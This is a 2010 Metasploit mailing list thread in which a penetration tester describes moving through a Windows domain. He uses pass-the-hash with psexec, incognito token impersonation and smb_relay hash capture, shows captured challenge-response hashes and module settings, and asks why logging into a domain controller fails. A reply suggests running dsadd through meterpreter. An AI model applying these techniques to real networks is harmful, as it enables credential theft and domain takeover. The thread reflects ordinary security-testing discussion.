Metasploit mailing list archives

Re: PSEXEC - Pass the Hash - Domain Credentials

From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sat, 30 Jan 2010 21:16:55 -0400

Upload dsadd tool and execute it with the -t option meterperter

http://support.microsoft.com/kb/322684

Sent from my Mobile Phone

On Jan 30, 2010, at 7:28 PM, troy () defendit com au wrote:

Hi All,

Is it possible to "pass the hash" using domain credentials to a DC?
The situation I find myself in. You get SYSTEM or Local Admin privson a
domain member (server/workstation). You PSEXEC pass the local admin
account hash around to other boxes until you find one that a Domain
Administrator has used recently (using incognito). Impersonate thedomainadmin account then gives you domain admin access, so you can mapdrives,create domain users (dependent on policy). However, you can notchange the
group membership of domain accounts, this must be done on a DC.
Meterpreter can not dump cached credentials, so I use smb_relay andgetthe impersonated account to map to my smb_relay and capture thechallenge
response. Which looks like:

pwfile
Administrator:ACME:1122334455667788:8b35f9c3c5dd2e65b50eeac1fa8056e809f3c2c21aa1572f:c3d6d3245736dc5168c89e2dc1c48fd939f964ed1f0faa04


logfile

HOMER:192.168.0.9:<NULL>:<NULL>:Windows 2002 2600:<NULL>:<NULL>:FriJan 29

19:14:25 -0500 2010
HOMER:192.168.0.9:Administrator:ACME:Windows 2002

2600:c3d6d3245736dc5168c89e2dc1c48fd939f964ed1f0faa04:8b35f9c3c5dd2e65b50eeac1fa8056e809f3c2c21aa1572f:Fri

Jan 29 19:14:25 -0500 2010

Load up smb/psexec and payload meterpreter/bind_tcp
set SMBUser Administrator
set SMBDomain ACME

Attempt the hash above and I get STATUS_LOGON_FAILURE. Even using the
known password I can not psexec to the DC, but the known password will
work to a member server (still not to the DC).

Could anybody provide their input please?

Thanks in advance.

Regards,
Troy


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

PSEXEC - Pass the Hash - Domain Credentials troy (Jan 30)
- Re: PSEXEC - Pass the Hash - Domain Credentials Carlos Perez (Jan 30)
- Message not available
  - Message not available
    - Re: [Fwd: PSEXEC - Pass the Hash - Domain Credentials] Jonathan Cran (Jan 30)
- Re: PSEXEC - Pass the Hash - Domain Credentials HD Moore (Jan 30)